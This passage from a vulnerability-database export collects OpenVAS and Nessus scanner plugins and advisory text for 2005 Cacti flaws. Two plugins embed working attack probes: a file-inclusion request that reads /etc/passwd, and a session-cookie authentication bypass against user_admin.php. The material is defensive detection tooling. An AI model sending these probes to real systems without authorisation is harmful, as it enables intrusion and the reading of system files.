res;\n}\nif ((res = isdpkgvuln(pkg:\"cacti\", ver:\"0.8.6c-7sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:10", "description": "The remote host is missing updates announced in\nadvisory GLSA 200506-20.", "cvss3": {}, "published": "2008-09-24T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200506-20 (cacti)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-1524", "CVE-2005-1526", "CVE-2005-1525"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:54972", "href": "http://plugins.openvas.org/nasl.php?oid=54972", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Cacti is vulnerable to several SQL injection, authentication bypass and\nfile inclusion vulnerabilities.\";\ntag_solution = \"All Cacti users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/cacti-0.8.6f'\n\nNote: Users with the vhosts USE flag set should manually use webapp-config\nto finalize the update.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200506-20\nhttp://bugs.gentoo.org/show_bug.cgi?id=96243\nhttp://bugs.gentoo.org/show_bug.cgi?id=97475\nhttp://www.cacti.net/release_notes_0_8_6e.php\nhttp://www.idefense.com/application/poi/display?id=267&type=vulnerabilities&flashstatus=false\nhttp://www.idefense.com/application/poi/display?id=266&type=vulnerabilities&flashstatus=false\nhttp://www.idefense.com/application/poi/display?id=265&type=vulnerabilities&flashstatus=false\nhttp://www.cacti.net/release_notes_0_8_6f.php\nhttp://www.hardened-php.net/advisory-032005.php\nhttp://www.hardened-php.net/advisory-042005.php\nhttp://www.hardened-php.net/advisory-052005.php\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200506-20.\";\n\n \n\nif(description)\n{\n script_id(54972);\n script_cve_id(\"CVE-2005-1524\",\"CVE-2005-1525\",\"CVE-2005-1526\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_name(\"Gentoo Security Advisory GLSA 200506-20 (cacti)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-analyzer/cacti\", unaffected: make_list(\"ge 0.8.6f\"), vulnerable: make_list(\"lt 0.8.6f\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-08-19T13:17:13", "description": "The remote host is affected by the vulnerability described in GLSA-200506-20 (Cacti: Several vulnerabilities)\n\n Cacti fails to properly sanitize input which can lead to SQL injection, authentication bypass as well as PHP file inclusion.\n Impact :\n\n An attacker could potentially exploit the file inclusion to execute arbitrary code with the permissions of the web server. An attacker could exploit these vulnerabilities to bypass authentication or inject SQL queries to gain information from the database. Only systems with register_globals set to 'On' are affected by the file inclusion and authentication bypass vulnerabilities. Gentoo Linux ships with register_globals set to 'Off' by default.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2005-06-23T00:00:00", "type": "nessus", "title": "GLSA-200506-20 : Cacti: Several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-1524", "CVE-2005-1525", "CVE-2005-1526"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:cacti", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200506-20.NASL", "href": "https://www.tenable.com/plugins/nessus/18547", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200506-20.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18547);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-1524\", \"CVE-2005-1525\", \"CVE-2005-1526\");\n script_xref(name:\"GLSA\", value:\"200506-20\");\n\n script_name(english:\"GLSA-200506-20 : Cacti: Several vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200506-20\n(Cacti: Several vulnerabilities)\n\n Cacti fails to properly sanitize input which can lead to SQL injection,\n authentication bypass as well as PHP file inclusion.\n \nImpact :\n\n An attacker could potentially exploit the file inclusion to execute\n arbitrary code with the permissions of the web server. An attacker\n could exploit these vulnerabilities to bypass authentication or inject\n SQL queries to gain information from the database. Only systems with\n register_globals set to 'On' are affected by the file inclusion and\n authentication bypass vulnerabilities. Gentoo Linux ships with\n register_globals set to 'Off' by default.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # http://www.cacti.net/release_notes_0_8_6e.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.cacti.net/release_notes_0_8_6e.php\"\n );\n # http://www.idefense.com/application/poi/display?id=267&type=vulnerabilities&flashstatus=false\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?91c98a8a\"\n );\n # http://www.idefense.com/application/poi/display?id=266&type=vulnerabilities&flashstatus=false\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7d5e7aa8\"\n );\n # http://www.idefense.com/application/poi/display?id=265&type=vulnerabilities&flashstatus=false\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f6cb3782\"\n );\n # http://www.cacti.net/release_notes_0_8_6f.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.cacti.net/release_notes_0_8_6f.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.hardened-php.net/advisory-032005.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.hardened-php.net/advisory-042005.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.hardened-php.net/advisory-052005.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200506-20\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Cacti users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/cacti-0.8.6f'\n Note: Users with the vhosts USE flag set should manually use\n webapp-config to finalize the update.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/06/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-analyzer/cacti\", unaffected:make_list(\"ge 0.8.6f\"), vulnerable:make_list(\"lt 0.8.6f\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Cacti\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:35:07", "description": "The Cacti application running on the remote web server is affected by a local file inclusion vulnerability due to improperly validating user-supplied input to the 'config[include_path]' parameter in 'config_settings.php'. A remote attacker can exploit this to execute arbitrary PHP code.", "cvss3": {"score": null, "vector": null}, "published": "2005-06-22T00:00:00", "type": "nessus", "title": "Cacti Local File Inclusion Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-1524", "CVE-2005-1525", "CVE-2005-1526"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cacti:cacti"], "id": "CACTI_086E.NASL", "href": "https://www.tenable.com/plugins/nessus/18546", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18546);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2005-1524\", \"CVE-2005-1525\", \"CVE-2005-1526\");\n script_bugtraq_id(\n 14027,\n 14028,\n 14030,\n 14042,\n 14128,\n 14129\n );\n\n script_name(english:\"Cacti Local File Inclusion Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is running a PHP application that is affected by\na local file inclusion vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Cacti application running on the remote web server is affected by\na local file inclusion vulnerability due to improperly validating\nuser-supplied input to the 'config[include_path]' parameter in\n'config_settings.php'. A remote attacker can exploit this to execute\narbitrary PHP code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.cacti.net/release_notes_0_8_6e.php\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/403174/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Cacti 0.8.6e or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Cacti graph_view.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/06/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/06/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cacti:cacti\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2005-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cacti_detect.nasl\");\n script_require_keys(\"www/cacti\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nget_install_count(app_name:'cacti', exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_install_from_kb(appname:'cacti', port:port, exit_on_fail:TRUE);\n\n\n # Try to exploit one of the file include flaws.\n dir = install['dir'];\n r = http_send_recv3(\n method:\"GET\",\n port: port,\n item:string(dir, \"/include/config_settings.php?\", \"config[include_path]=/etc/passwd%00\"),\n exit_on_fail:TRUE\n );\n\n res = r[2];\n\n # There's a problem if we get the password file.\n if (egrep(string:res, pattern:\"root:.+:0:[01]:\")) {\n security_hole(port);\n exit(0);\n }\n else audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Cacti', build_url(qs:dir, port:port));\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:49:18", "description": "According to its self-reported version number, the Cacti application running on the remote web server is prior to version 0.8.6e. It is, therefore, potentially affected by the following vulnerabilities :\n\n - A PHP file inclusion vulnerability exists in 'top_graph_header.php' that allows remote attackers to execute arbitrary PHP code using the 'config[library_path]' parameter. (CVE-2005-1524)\n\n - A SQLi vulnerability exists in 'config_settings.php' that allows remote attackers to execute arbitrary SQL commands using the 'id' parameter. (CVE-2005-1525)\n\n - A PHP remote file inclusion vulnerability exists in 'config_settings.php' that allows remote attackers to execute arbitrary PHP code using the 'config[include_path]' parameter. (CVE-2005-1526)", "cvss3": {"score": null, "vector": null}, "published": "2015-03-03T00:00:00", "type": "nessus", "title": "Cacti < 0.8.6e Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-1524", "CVE-2005-1525", "CVE-2005-1526"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cacti:cacti"], "id": "CACTI_086E_VCHECK.NASL", "href": "https://www.tenable.com/plugins/nessus/81601", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81601);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2005-1524\", \"CVE-2005-1525\", \"CVE-2005-1526\");\n script_bugtraq_id(\n 14027,\n 14028,\n 14030,\n 14042,\n 14128,\n 14129\n );\n\n script_name(english:\"Cacti < 0.8.6e Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is running a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Cacti application\nrunning on the remote web server is prior to version 0.8.6e. It is,\ntherefore, potentially affected by the following vulnerabilities :\n\n - A PHP file inclusion vulnerability exists in\n 'top_graph_header.php' that allows remote attackers to\n execute arbitrary PHP code using the\n 'config[library_path]' parameter. (CVE-2005-1524)\n\n - A SQLi vulnerability exists in 'config_settings.php'\n that allows remote attackers to execute arbitrary SQL\n commands using the 'id' parameter. (CVE-2005-1525)\n\n - A PHP remote file inclusion vulnerability exists in\n 'config_settings.php' that allows remote attackers to\n execute arbitrary PHP code using the\n 'config[include_path]' parameter. (CVE-2005-1526)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.cacti.net/release_notes_0_8_6e.php\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/403174/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Cacti 0.8.6e or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Cacti graph_view.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/06/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/03\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cacti:cacti\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cacti_detect.nasl\");\n script_require_keys(\"installed_sw/cacti\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = 'cacti';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ninstall_url = build_url(qs:install['path'], port:port);\nversion = install['version'];\n\nver = split(version, sep:'.', keep:FALSE);\nif (\n int(ver[0]) == 0 &&\n (\n int(ver[1]) < 8 ||\n (int(ver[1]) == 8 && ver[2] =~ '^([0-5][a-z]?|6[a-d]?)$')\n )\n)\n{\n set_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE);\n if (report_verbosity > 0)\n {\n report = '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 0.8.6e' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\naudit(AUDIT_WEB_APP_NOT_AFFECTED, \"Cacti\", install_url, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:49:44", "description": "According to its self-reported version number, the Cacti application running on the remote web server is prior to version 0.8.6f. It is, therefore, potentially affected by the following vulnerabilities :\n\n - Multiple vulnerabilities exist due to improper input validation in 'graph_image.php' and 'graph.php'.\n (CVE-2005-2148)\n\n - A flaw exists in 'config.php' that allows remote attackers to set the 'no_http_headers' switch and then modify session information in order to gain the privileges necessary to perform SQL injection attacks.\n (CVE-2005-2149)", "cvss3": {"score": null, "vector": null}, "published": "2015-03-03T00:00:00", "type": "nessus", "title": "Cacti < 0.8.6f Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-2148", "CVE-2005-2149"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cacti:cacti"], "id": "CACTI_086F_VCHECK.NASL", "href": "https://www.tenable.com/plugins/nessus/81602", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81602);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2005-2148\", \"CVE-2005-2149\");\n script_bugtraq_id(14027, 14130);\n\n script_name(english:\"Cacti < 0.8.6f Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is running a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Cacti application\nrunning on the remote web server is prior to version 0.8.6f. It is,\ntherefore, potentially affected by the following vulnerabilities :\n\n - Multiple vulnerabilities exist due to improper input\n validation in 'graph_image.php' and 'graph.php'.\n (CVE-2005-2148)\n\n - A flaw exists in 'config.php' that allows remote\n attackers to set the 'no_http_headers' switch and then\n modify session information in order to gain the\n privileges necessary to perform SQL injection attacks.\n (CVE-2005-2149)\");\n # https://web.archive.org/web/20061130123447/http://www.hardened-php.net/index.30.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a392bde5\");\n # https://web.archive.org/web/20061130122909/http://www.hardened-php.net/index.31.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?79df242f\");\n # https://web.archive.org/web/20060502023335/http://www.hardened-php.net/index.33.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8090490f\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.cacti.net/release_notes_0_8_6f.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Cacti 0.8.6f or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/07/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/03\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cacti:cacti\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cacti_detect.nasl\");\n script_require_keys(\"installed_sw/cacti\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = 'cacti';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ninstall_url = build_url(qs:install['path'], port:port);\nversion = install['version'];\n\nver = split(version, sep:'.', keep:FALSE);\nif (\n int(ver[0]) == 0 &&\n (\n int(ver[1]) < 8 ||\n (int(ver[1]) == 8 && ver[2] =~ '^([0-5][a-z]?|6[a-e]?)$')\n )\n)\n{\n set_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE);\n if (report_verbosity > 0)\n {\n report = '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 0.8.6f' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\naudit(AUDIT_WEB_APP_NOT_AFFECTED, \"Cacti\", install_url, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:39:12", "description": "The Cacti application running on the remote web server is affected by an authentication bypass vulnerability.", "cvss3": {"score": null, "vector": null}, "published": "2005-07-05T00:00:00", "type": "nessus", "title": "Cacti < 0.8.6f Authentication Bypass Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-2148", "CVE-2005-2149"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cacti:cacti"], "id": "CACTI_086F.NASL", "href": "https://www.tenable.com/plugins/nessus/18619", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18619);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2005-2148\", \"CVE-2005-2149\");\n script_bugtraq_id(14027, 14130);\n\n script_name(english:\"Cacti < 0.8.6f Authentication Bypass Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is running a PHP application that is affected by\nan authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Cacti application running on the remote web server is affected by\nan authentication bypass vulnerability.\");\n # https://web.archive.org/web/20061130123447/http://www.hardened-php.net/index.30.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a392bde5\");\n # https://web.archive.org/web/20061130122909/http://www.hardened-php.net/index.31.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?79df242f\");\n # https://web.archive.org/web/20060502023335/http://www.hardened-php.net/index.33.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8090490f\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.cacti.net/release_notes_0_8_6f.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Cacti 0.8.6f or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/07/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cacti:cacti\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2005-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cacti_detect.nasl\");\n script_require_keys(\"www/cacti\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nget_install_count(app_name:'cacti', exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_install_from_kb(appname:'cacti', port:port, exit_on_fail:TRUE);\n\ndisable_cookiejar();\ndir = install['dir'];\n\n # Try to exploit the authentication bypass flaw.\n r = http_send_recv3(port: port, method: 'GET',\n item: strcat(dir, \"/user_admin.php\"),\n add_headers: make_array(\"Cookie\", \"_SESSION[sess_user_id]=1;no_http_headers=1;\"));\n if (isnull(r)) exit(0);\n\n # There's a problem if we get a link for adding users.\n if ('href=\"user_admin.php?action=user_edit\">Add' >< r[2]) {\n security_hole(port);\n exit(0);\n }\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T19:18:53", "description": "### Background\n\nCacti is a complete web-based frontend to rrdtool. \n\n### Description\n\nCacti fails to properly sanitize input which can lead to SQL injection, authentication bypass as well as PHP file inclusion. \n\n### Impact\n\nAn attacker could potentially exploit the file inclusion to execute arbitrary code 